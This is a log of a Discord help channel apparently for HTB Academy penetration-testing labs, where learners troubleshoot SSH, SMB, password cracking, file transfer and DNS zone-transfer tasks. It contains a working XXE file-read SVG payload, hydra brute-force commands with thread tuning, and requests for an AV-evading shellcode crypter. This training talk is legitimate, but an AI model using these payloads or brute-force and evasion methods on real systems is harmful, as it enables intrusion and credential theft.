well look at that, instructions given above the first question to ssh

and the credentials to do so

also for q1 uname would be the tool/command used

not the answer

I did that

But it doesn’t work@

"doesn't work" isn't descriptive

well yes

I am sending a video

because

1. you need to ssh to the target

2. uname -a

your main issue is that you haven't done step 1) connect to the target

because Linux is the kernel

if you do man uname or uname -h you can see what other flags you can use to get more specific info

add -sT

or -T4

What is the best way to learn programming languages?

Metasploit module in Pentester path

Trying to exploit the SMB share and metasploit keeps exploiting it but not creating a shell / completing the exploit any hints as to what I'm doing wrong? set the RHOSTS to the box IP, SMBUser to the user and SMBPass to the password

you're gonna be real mad, but use what's in the Version Column

😉

user error: problem solved

you need to list the shares

is my bad i did not see the share name :(

blud doesn't know how it password prompts work

it's normal for password prompts not to show the password as you type it

it's best to copy/paste

to paste into terminal; ctrl-shift-v

gonna be honest chief it'd be better if you just described the problem instead of taking 420p videos from your phone

it's actually 480

let's give the man some credit

oh oops i got it flipped it's 360p

i was mostly memeing with the funny number

ya i know 😛 just teasing you

Is anyone else having trouble spawning the targets? I'm trying for over 30 minutes do spawn the target from AD Enumeration & Attacks - Skills Assessment Part II. Yesterday was normal 😦

try changing vpn regions

I did this with US EAST and WEST VPN's, but nothing changed. Will give a try to CA...

Now spawned, i guess i needed to complain somewhere lul

the VPNs aren't labeled EAST/WEST that's pwnbox region

the VPNs are labeled us-academy-[1,2,3] or eu-academy-[1,2]

got it

how do i list services listening on interfaces, i used service --status-all, and systemctl list-unit-files --type=service

usually netstat is a good command to start with

man netstat will provide you the flags you can look for to get your info

4 VPNs per region now? spudoodios

oh wait, EU has 5

i was also trying with netstat -all |grep Listen | wc -l

i would take off the wc -l part

as the answer specifically states to exclude certain interfaces i.e. ipv6

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only), this is the question, as far as i understood, is asking for all, not just those, am i confused?

just take off the wc -l portion and you'll see

you're still seeing all listening interfaces

just need to drop off certain ones

it's also asking specifically in this instance ipv4 only

it seems weird

but it's saying not localhost (127.0.0.0/::1) and ipv4 only so generally 0.0.0.0

well, are you connected to the target system? the commands MarcieLee gave you are for your local system, so they will only work if you're remotely connected already, otherwise you may need to run something like nmap to find what services are running on various ports.

i am connected on target via ovpn

that's not how ovpn works

ovpn just connects you to the vpn network

open vpn connects you to the same network, so you can access the victim host you spawn. you'll need to connect to the victim box with ssh or rdp, or something like that.

oh, also ssh

not also

just via ssh

as I said

drop the wc -l part

so you can see what it's actually grabbing

ok, let me try that

and adjust your grep or strategy

note: -v is inverse grep, and matches the opposite of what you specify

so if you have a list

1
2
3
4

and do grep -v 3, it'll select lines 1, 2, and 4

i have been on this almost all afternoon, i will come back fresh tomorrow, have a great night, and tyvm for ur assist.

yup next time mention the module and section so people can better assist

oh, sorry, yup LINUX FUNDAMENTALS
Filter Contents

see you tomorrow

can anyone give me a nudge on the file upload skill assessment. I'm not able to find where the contact/upload.php file is to read it's contents. I'm using an XXE payload. I'm able to read /etc/passwd file fine. The payload was not wrong.

||<?xml version="1.0" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [

<!ENTITY xxe SYSTEM "file:///var/www/html/index.php">

]>

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">

<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

<text font-size="16" x="0" y="16">&xxe;</text>

<script type="text/javascript">

    alert(document.domain);

</script>

</svg>'

||

I think the only time XXE is mentioned is in the Limited File Uploads section, give that a review.

hey superNuts you still there

yeah

im still on the module do I need to try a wordlist to see if another parameter works

or work with the ones they give me

what module

file inclusion

send me a dm

I dont have my notes with me, but i guess thats footprinting lab? Hard?
Rdp is open but yea wrong creds from what i remember

Footprinting Medium, I've now found the ||service account through enumerating SMB with the alex user found in nfs share|| but seems like I cannot RDP with that one either.

In the nfs? Sorry if i give false info since im speaking out of my memori but im pretty sure from nfs share you should get another user

And not alex

if your user isn't an administrator they need to be in the "Remote Desktop Users" group to rdp

Thanks, however I cannot verify that until I have a foothold, correct?

Ah sorry, yea no i was thinking of hard lab still ffs.

You typed wrong password

Into rdp. You can use single quotes

Yeah but I'm not sure if I shall use alex or sa account

if you get this kind of error it's issue on OS level probablyu access denied

nah that's a network problem

i can rdp fine with the admin though

What did you do after finding alex/sa account?

Ah now i remember.
Yea i oersonally went with alex( for start) before i needed higher privs

Read the msql server where the htb user is located

i'm not doing the module im just telling you the errors you might see

Why is my screenshots being deleted

Well i know it says Sa but it maybe just means its a password for an account

Contains spoiler like a password

My bad

Can you rdp with alex?

Let me try again

If not then network problem

Make sire to put it jn single quotes

Since he maybe dont like special chars

Yup single quotes did it

Soooo…
I’m in Getting Started/Attacking Your First Box/Nibbles Web Footprinting-Initial Foothold

It’s not allowing me to navigate to the nibbleblog directory.
There’s no way to complete the module.

Add the full link

And try again
Like http://Ip/nibbleblog

All the pwnbox region show high latency. Internet is working fine. Am I the only one facing the issue?

does it change on reload

I did.

It improved a little. But still it is very slow, and when I type in commands, they take forever to appear on the screen 😦

the NA vpns havve been down last few weeks. switch to EU 2

by not being able to reach it do you mean the site gets stuck loading forever or is there some error?

Visitng it? I mean from what i see you get same error as in the writeup?

Will try this

mine are fine

Loads forever.

try lowering the mtu to 1250 for tun0

"mine are fine" your ping is over 170 for all of them 😭 💀

No, in the writeup it says the “full” address is [200 OK]

i'm doing the sigma rules module which have a lot of rdp too :))))

Then try and add / at the end but id be suprised if thats the cause

Ah im blind

I did.
It won’t load the site.

You already did, it was at the end

try what i said

I added the / at the end. It won’t load.
Try what else?

im not schainy
sudo ifconfig tun0 mtu 1250

Oooh wrong person. Sorry.

What does this command mean sir??
It worked.
Thanks.

makes max packet size smaller
dont knw how it works on a lower level but i learnt this during offsec course

Wow…
Offsec, to get the OSCP?

yup i failed it
the "getting stuck loading forever" always troubleshoot mtu first

Ahhh, better luck next time.
You have any HTB certs yet?

I’ll try to remember that tip.
I feel I shouldn’t have had to do that though, like they should fix it.
Hopefully I can complete the whole module now.

i only have gcih and i'm using htb academy to get exposure to things that weren't taught to me like sigma rules
Have fun

Right on… 😎

Greetings gents.

Module: Password Attacks > Password Attacks Lab - Easy

Confused as to how I should proceed with this lab. Attempting to brute force the SSH service with crackmapexec and the lab is either timing out after taking so long or im getting no hits when I try to use brute force this. I've tried bruteforcing root account using mutated password list and password list from the module as well as rockyou.txt and im getting no hits. Using the provided username list causes the target to time out and despawn before I can complete it.

What am I doing wrong here?

ssh is super slow to brute, try another service

Hi, could someone give me a time estimate on how long it should take to crack the password for Password Attacks: Password Mutations?

20 min or less

depends on your computer and the section

I'll try FTP, ty

Did you work it out in the end?

I've been using pwnbox.
I used this command to generate the mutated list:
||```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

And then I ran this command to crack the password:
||```
hydra -l sam -P mut_password.list ssh://10.129.202.64
```||
It's been 40+ minutes...

Getting this when I try to use crackmapexec with FTP instead of SSH :C

yeah and use the username and password list in the resources

^ That was my plan if root/rockyou.txt wasnt gonna work

but uh ftp isnt happy with me

reboot the box

dont use rockyou use the resources

👍

oh this one. may take longer, not sure. this was a pain.

also don't brute ssh

Thanks for telling me ⚰️

The question told me to though? Or were you talking to the other guy?

both

it didn't say brute force ssh

it said log in with ssh once you have the password

Oh, which service would you recommend I brute force instead? I did a quick Nmap scan and I've got FTP and SMB available.

use ftp with 48 threads

Can anyone have free fire hack?

I looked through the man page for Hydra, couldn't find an option for threads. Does tasks = threads?

no, that's not what this discord is about

yeah tasks sorry

I know but thanks

Btw if you don't mind me asking, what are tasks in Hydra? Is it number of connections to be run in parallel?

-t (tasks) specifies the number of parallel tasks, like the concurrent sessions it will establish

how many it runs at the same time

Is there a way to know how many parallel tasks your machine can handle?

its more how many the ftp server can handle not your machine

for htb modules 48 is the sweet spot

64 will dos the server

I able to navigate to the directories in the browser, but I can’t curl them, and the gobuster attack doesn’t work.
Weird.

I see. Thanks for your help.

Is curl stuck forever?

No, just sends a little “not found” html page in the terminal.

then what's on the browser

Same as the example in the module.
Info about the blog.

I'm not sure which part this is

Getting Started > Attacking Your First Box > Nibbles Web Footprinting

Module Example:

My browser:

My terminal:

you spelled nibble wrong

Shit… 😅

Thanks again.

Windows File Transfer Methods

What's wrong here I don't know

because that address isn't real; it doesn't exist; you don't have access to it

scroll all the way down

there's a "spawn target" button

oh wait

is he trying to connect his own host to the vm

yes

and also that's not how copy works

see the task bar

that powershell console is on host

oh brother

if you look above that they were trying to 1::1 the section

well good thing the connection failed if not he would've leaked his own ntlmv2 hash

I'm trying this on my pc

you also don't know how shares work

copy \\ip\share\file . will copy the file to your current directory

why try this on your pc when they literally gave you a target to use?

^

even if you got the path right, nc.exe will 100% get marked by defender

I imagine I am in the real world

I wanted to see if AV would stop me

Okay thx 😊

depending what you're doing yes

Xre0uS point is, it's generally not smart to test on your host

you can enable defender on the target since you have admin privs

brother you didn't even get the copy command right

and functionally do the same thing

Can someone please share their code for the AES crypter at the start of windows evasion?

Not on my host. On another virtual machine

doesn't look like another VM to me

as it looks like the PowerShell console is running on your host

as it's above the chrome and other vm window

unless you're telling me you went turtles all the way down, which I doubt given the current conversation

you are right

I will try again

no, figure out yourself :) (that's the point, unless it's just given by the module -- in that case read

I have tried lots of different ways I think it’s in what I’m doing with cyber chef and one of those “you don’t know until you know” things

Ticking the right box on the right form, and not a matter of not learning or reading. So it’s easier if I can just know where I went wrong in the procedure

The code is given by the module, too, i think it’s how much of the shellcode generated is included in the encrypted data, whether the variable declaration is in it (and which parts?) or its pure shellcode

where did you get the original meterpreter shellcode from? did you test that it works

also it's better to describe what issue you're facing instead of just asking for code

not work

brother

what

you missed an important thing

??

the sharename

you just did \\ip\file

it's \\ip\share\file

it "not work" because you didn't do it right

wait

weird it's reading the . as part of the filename

try ./ and see if that changes it

or ./file.xt

learn to read errors

haha object not found bro

worst case you'd have to specify the full filepath

and look above as it's highlighting the whole line

including the .

look

you can also do copy /? to see it's syntax

The device connects but there is no file

try specifying the full path

like C:/Windows/Temp

you can also try net use x: \\ip\share\ and navigate to X:

why is your syntax 'sudo impacket-smbserver share . -smb2support' when the example says ''sudo impacket-smbserver share -smb2support'

no it's not

Look at the impacket smb server setup pic

sudo impacket-smbserver [sharename] [file location] -smb2support

look

marcie

VPN IP

look at the smbserver screenshot

not vpn my host

there is a . between share and -smb2

actually to correct

it's sudo impacket-smbserver [sharename] -smb2support [filelocation]

it looks like it created it weirdly

¯_(ツ)_/¯

I'm pretty confident in what I can see

filelocation ?? how

so am i

as in the directory

you goon

in att or vic

brother

i'll give you one attempt to critically think about the command i shared

and tell me if you think it should be on the att or vic machine

ok still not work

¯_(ツ)_/¯

sudo impacket-smbserver share -smb2support /tmp/smbshare

like HTB

could just be that windows doesn't like it

Msfvenom lol, where do you get yours???

could be your msfvenom command was wrong

For real, you’re going to hit me with that “have you tried turning it on and off again?”

lol

¯_(ツ)_/¯

just offering up a potential issue

Can I ask have you done this bit?

Coz my question could be direct. Do I include the variable declaration in the encryption I feed to cyberchef or just the shellcode?

no idea brother, yes i haven't done this bit. and @next bronze point was did you try it

as in are you sure it works before trying to dig into it

Ok I’ll look into it

if it doesn't work, then the point is moot

i mean you can try with and without throwing the variable dec into cyberchef

no just the shellcode

but afaik cyberchef just does decoding

yes

no need to be crazy with it

cyberchef only encrypts/decypts, it doesn't write the var for you

Can I see your recipe on cyberchef ? To cross check Against mine

how i can send photo on chat i got stuck in footprinting module

it will be the same as the module, it has worked for them

Hmmm ok. No worries. Thanks for your time!

read and follow #welcome you can also describe where you're 'stuck'

I write my own encryptor/decryptor in C using bcrypt

So you didn’t follow the module?

You got it on GitHub or anything?

my guy, just try to make it yourself, maldev is frustrating, I get it, but figuring it out yourself based on what's in the module is more fun

Haha just about the time saving. It’s a new concept for me. I’m fine with hearing the answer and making my way from there

i am sure i did it but there some stubbed problem

It’s the age of ChatGPT. If you think hearing the answer is cheating. Your in the Bronze Age

?

it defeats the purpose of learning

Post humanity bro, save your tears. The singularity is coming

if you just want the answers then pay for an annual sub

Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))

There is zero difference between reading a book and being told what the book meant

subdomains exist and one is a zone that can be transferred to

dig txt subdomain.inlanefreight.htb @target_ip

there's a generous leap of logic betweene those two

i did it

as one requires critical thinking

you can also try dig axfr subdomain.inlanefreight.htb @target_ip

Let’s assume critical thinking is a certainty. There’s no difference

you should be able to arrive at conclusions on your own, without being told